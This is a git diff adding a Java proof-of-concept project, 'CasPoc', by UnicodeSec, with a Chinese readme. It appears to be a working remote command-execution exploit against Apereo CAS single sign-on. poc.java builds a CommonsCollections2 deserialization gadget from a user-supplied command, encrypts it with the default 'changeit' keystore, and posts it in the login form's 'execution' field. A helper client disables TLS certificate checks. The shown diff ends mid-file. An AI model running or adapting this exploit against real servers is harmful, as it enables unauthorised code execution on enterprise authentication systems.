diff --git a/.idea/$CACHE_FILE$ b/.idea/$CACHE_FILE$
new file mode 100644
index 0000000..ea76935
--- /dev/null
+++ b/.idea/$CACHE_FILE$
@@ -0,0 +1,47 @@
+
+
+
+
+
+
+
+
+ Android
+
+
+ CDI (Contexts and Dependency Injection)
+
+
+ CodeSpring CoreSpring
+
+
+ EncapsulationJava
+
+
+ Java
+
+
+ LintAndroid
+
+
+ SecurityLintAndroid
+
+
+ Spring
+
+
+ Spring AOPSpring
+
+
+ Spring CoreSpring
+
+
+
+
+ Android
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/compiler.xml b/.idea/compiler.xml
new file mode 100644
index 0000000..bab543e
--- /dev/null
+++ b/.idea/compiler.xml
@@ -0,0 +1,13 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/encodings.xml b/.idea/encodings.xml
new file mode 100644
index 0000000..aa00ffa
--- /dev/null
+++ b/.idea/encodings.xml
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/jarRepositories.xml b/.idea/jarRepositories.xml
new file mode 100644
index 0000000..abb532a
--- /dev/null
+++ b/.idea/jarRepositories.xml
@@ -0,0 +1,20 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 0000000..3736354
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,18 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 0000000..aca4e3c
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,217 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1596180457747
+
+
+ 1596180457747
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ jar://$PROJECT_DIR$/cas-0.0.1-all.jar!/maoge/cas/AESBase64.class
+ 64
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/poc.java
+ 80
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/EncryptedTranscoder.java
+ 62
+
+
+
+ file://$PROJECT_DIR$/src/main/java/org/unicodesec/EncryptedTranscoder.java
+ 104
+
+
+
+ jar://$MAVEN_REPOSITORY$/org/cryptacular/cryptacular/1.0/cryptacular-1.0.jar!/org/cryptacular/bean/AbstractCipherBean.class
+ 61
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CasPoc.iml b/CasPoc.iml
new file mode 100644
index 0000000..78b2cc5
--- /dev/null
+++ b/CasPoc.iml
@@ -0,0 +1,2 @@
+
+
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
new file mode 100644
index 0000000..8a4bf48
--- /dev/null
+++ b/pom.xml
@@ -0,0 +1,106 @@
+
+
+
+ 4.0.0
+
+ org.unicodesec
+ CasPoc
+ 1.0-SNAPSHOT
+
+ CasPoc
+
+ http://www.example.com
+
+
+ UTF-8
+ 1.7
+ 1.7
+
+
+
+
+ org.javassist
+ javassist
+ 3.24.0-GA
+
+
+ org.springframework.webflow
+ spring-webflow
+ 2.4.1.RELEASE
+
+
+ org.apache.httpcomponents
+ httpclient
+ 4.5.9
+
+
+ org.apache.commons
+ commons-collections4
+ 4.0
+
+
+ org.cryptacular
+ cryptacular
+ 1.0
+
+
+
+ commons-io
+ commons-io
+ 2.6
+
+
+ org.jasig
+ spring-webflow-client-repo
+ 1.0.0
+
+
+ org.reflections
+ reflections
+ 0.9.10
+
+
+ com.nqzero
+ permit-reflect
+ 0.3
+
+
+ org.ow2.asm
+ asm-all
+ 5.1
+
+
+
+
+
+
+ org.apache.maven.plugins
+ maven-assembly-plugin
+ 2.4.1
+
+
+
+ jar-with-dependencies
+
+
+
+
+ org.unicodesec.poc
+
+
+
+
+
+ make-assembly
+
+ package
+
+ single
+
+
+
+
+
+
+
diff --git a/readme.md b/readme.md
new file mode 100644
index 0000000..9e5faf1
--- /dev/null
+++ b/readme.md
@@ -0,0 +1,10 @@
+## 简介
+Apereo CAS 是一个开源的企业级单点登录系统,很多统一认证系统都是基于此系统二次开发
+
+1. 支持自定义命令
+
+## 效果
+
+
+感谢 https://github.com/langligelang/CAS_EXP/tree/master/
+代码略作修改,使用asm自定义命令
\ No newline at end of file
diff --git a/src/logback.xml b/src/logback.xml
new file mode 100644
index 0000000..445c40c
--- /dev/null
+++ b/src/logback.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/src/main/java/org/unicodesec/EncryptedTranscoder.java b/src/main/java/org/unicodesec/EncryptedTranscoder.java
new file mode 100644
index 0000000..1b2b1ca
--- /dev/null
+++ b/src/main/java/org/unicodesec/EncryptedTranscoder.java
@@ -0,0 +1,107 @@
+package org.unicodesec;
+
+import org.cryptacular.bean.BufferedBlockCipherBean;
+import org.cryptacular.bean.CipherBean;
+import org.cryptacular.bean.KeyStoreFactoryBean;
+import org.cryptacular.generator.sp80038a.RBGNonce;
+import org.cryptacular.io.URLResource;
+import org.cryptacular.spec.BufferedBlockCipherSpec;
+import org.jasig.spring.webflow.plugin.Transcoder;
+import payloads.Serializer;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.net.URL;
+import java.security.KeyStore;
+import java.util.zip.GZIPInputStream;
+import java.util.zip.GZIPOutputStream;
+
+public class EncryptedTranscoder implements Transcoder {
+ private CipherBean cipherBean;
+ private boolean compression = true;
+
+ public EncryptedTranscoder() {
+ BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
+ bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
+ bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
+ bufferedBlockCipherBean.setKeyAlias("aes128");
+ bufferedBlockCipherBean.setKeyPassword("changeit");
+ bufferedBlockCipherBean.setNonce(new RBGNonce());
+ this.setCipherBean(bufferedBlockCipherBean);
+ }
+
+ public EncryptedTranscoder(CipherBean cipherBean) throws IOException {
+ this.setCipherBean(cipherBean);
+ }
+
+ public void setCompression(boolean compression) {
+ this.compression = compression;
+ }
+
+ protected void setCipherBean(CipherBean cipherBean) {
+ this.cipherBean = cipherBean;
+ }
+
+ public byte[] encode(Object o) throws IOException {
+ if (o == null) {
+ return new byte[0];
+ }
+
+ byte[] out = null;
+
+ if (this.compression) {
+ ByteArrayOutputStream byteout = new ByteArrayOutputStream();
+ GZIPOutputStream gzip = new GZIPOutputStream(byteout);
+ gzip.write(Serializer.serialize(o));
+ gzip.close();
+ out = byteout.toByteArray();
+ } else {
+ out = Serializer.serialize(o);
+ }
+ return this.cipherBean.encrypt(out);
+
+ }
+
+ public Object decode(byte[] encoded) throws IOException {
+ byte[] data;
+ try {
+ data = this.cipherBean.decrypt(encoded);
+ } catch (Exception var11) {
+ throw new IOException("Decryption error", var11);
+ }
+
+ ByteArrayInputStream inBuffer = new ByteArrayInputStream(data);
+ ObjectInputStream in = null;
+
+ Object var5;
+ try {
+ if (this.compression) {
+ in = new ObjectInputStream(new GZIPInputStream(inBuffer));
+ } else {
+ in = new ObjectInputStream(inBuffer);
+ }
+
+ var5 = in.readObject();
+ } catch (ClassNotFoundException var10) {
+ throw new IOException("Deserialization error", var10);
+ } finally {
+ if (in != null) {
+ in.close();
+ }
+
+ }
+
+ return var5;
+ }
+
+ protected KeyStore createAndPrepareKeyStore() {
+ KeyStoreFactoryBean ksFactory = new KeyStoreFactoryBean();
+ URL u = this.getClass().getResource("/etc/keystore.jceks");
+ ksFactory.setResource(new URLResource(u));
+ ksFactory.setType("JCEKS");
+ ksFactory.setPassword("changeit");
+ return ksFactory.newInstance();
+ }
+}
diff --git a/src/main/java/org/unicodesec/SSLClient.java b/src/main/java/org/unicodesec/SSLClient.java
new file mode 100644
index 0000000..e187e9e
--- /dev/null
+++ b/src/main/java/org/unicodesec/SSLClient.java
@@ -0,0 +1,36 @@
+package org.unicodesec;
+
+import java.security.SecureRandom;
+import java.security.cert.CertificateException;
+import java.security.cert.X509Certificate;
+import javax.net.ssl.KeyManager;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import org.apache.http.conn.ClientConnectionManager;
+import org.apache.http.conn.scheme.Scheme;
+import org.apache.http.conn.scheme.SchemeRegistry;
+import org.apache.http.conn.ssl.SSLSocketFactory;
+import org.apache.http.impl.client.DefaultHttpClient;
+
+public class SSLClient extends DefaultHttpClient {
+ public SSLClient() throws Exception {
+ SSLContext ctx = SSLContext.getInstance("TLS");
+ X509TrustManager tm = new X509TrustManager() {
+ public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
+ }
+
+ public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
+ }
+
+ public X509Certificate[] getAcceptedIssuers() {
+ return null;
+ }
+ };
+ ctx.init((KeyManager[])null, new TrustManager[]{tm}, (SecureRandom)null);
+ ClientConnectionManager ccm = this.getConnectionManager();
+ SchemeRegistry sr = ccm.getSchemeRegistry();
+ SSLSocketFactory ssf = new SSLSocketFactory(ctx, SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
+ sr.register(new Scheme("https", 443, ssf));
+ }
+}
diff --git a/src/main/java/org/unicodesec/poc.java b/src/main/java/org/unicodesec/poc.java
new file mode 100644
index 0000000..78da15d
--- /dev/null
+++ b/src/main/java/org/unicodesec/poc.java
@@ -0,0 +1,85 @@
+package org.unicodesec;
+
+
+import org.apache.commons.io.IOUtils;
+import org.apache.http.HttpVersion;
+import org.apache.http.NameValuePair;
+import org.apache.http.client.entity.UrlEncodedFormEntity;
+import org.apache.http.client.methods.CloseableHttpResponse;
+import org.apache.http.client.methods.HttpPost;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClients;
+import org.apache.http.message.BasicNameValuePair;
+import org.apache.log4j.BasicConfigurator;
+import org.apache.log4j.Level;
+import org.apache.log4j.Logger;
+import org.apache.log4j.PropertyConfigurator;
+import sun.misc.BASE64Encoder;
+
+import java.nio.charset.Charset;
+import java.util.*;
+import java.util.Map.Entry;
+
+public class poc {
+
+ public poc() {
+ }
+
+ public static void main(String[] args) throws Exception {
+ String text = " _____ ______ \n" +
+ " / ____| | ____| \n" +
+ " | | __ _ ___ | |__ __ __ _ __ \n" +
+ " | | / _` | / __| | __| \\ \\/ / | '_ \\ \n" +
+ " | |____ | (_| | \\__ \\ | |____ > < | |_) |\n" +
+ " \\_____| \\__,_| |___/ |______| /_/\\_\\ | .__/ \n" +
+ " | | \n" +
+ " |_| \n" +
+ " Powered by UnicodeSec \n";
+ System.out.println(text);
+ if (args.length < 2) {
+ System.out.println("java -jar cas-[version]-all.jar [url] [cmd]");
+ } else {
+ String url = args[0].trim();
+ String cmd = args[1].trim();
+ BASE64Encoder encoder = new BASE64Encoder();
+ Object payloadObject = payloads.gadgets.CommonsCollections2.class.newInstance().getObject(cmd);
+ EncryptedTranscoder et = new EncryptedTranscoder();
+ byte[] encode = et.encode(payloadObject);
+ String payload = encoder.encode(encode);
+ System.out.println(String.format("executing command %s", cmd));
+ Map map = new HashMap();
+ map.put("username", "13222233322");
+ map.put("password", "Test1234");
+ map.put("lt", "LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org");
+ map.put("execution", "7b951c2a-e78f-4286-95fe-970782352a84_" + payload);
+ map.put("_eventId", "submit");
+ String result = "result:\n\t";
+ System.out.println(result + doPost(url, map, url.startsWith("https")));
+ }
+ }
+
+ public static String doPost(String apiUrl, Map params, boolean isSSL) throws Exception {
+ CloseableHttpClient httpClient = HttpClients.createDefault();
+ HttpPost httpPost = new HttpPost(apiUrl);
+
+ List pairList = new ArrayList(params.size());
+ Iterator var7 = params.entrySet().iterator();
+
+ while (var7.hasNext()) {
+ Entry entry = (Entry) var7.next();
+ NameValuePair pair = new BasicNameValuePair(entry.getKey(), entry.getValue().toString());
+ pairList.add(pair);
+ }
+ httpPost.setEntity(new UrlEncodedFormEntity(pairList, Charset.forName("UTF-8")));
+ httpPost.setProtocolVersion(HttpVersion.HTTP_1_0);
+ CloseableHttpResponse response;
+ if (isSSL) {
+ httpClient = new SSLClient();
+ }
+ response = httpClient.execute(httpPost);
+
+ return IOUtils.toString(response.getEntity().getContent(), "utf-8");
+
+ }
+
+}
diff --git a/src/main/java/payloads/Deserializer.java b/src/main/java/payloads/Deserializer.java
new file mode 100644
index 0000000..ec67639
--- /dev/null
+++ b/src/main/java/payloads/Deserializer.java
@@ -0,0 +1,29 @@
+package payloads;
+
+import java.io.*;
+import java.util.concurrent.Callable;
+
+public class Deserializer implements Callable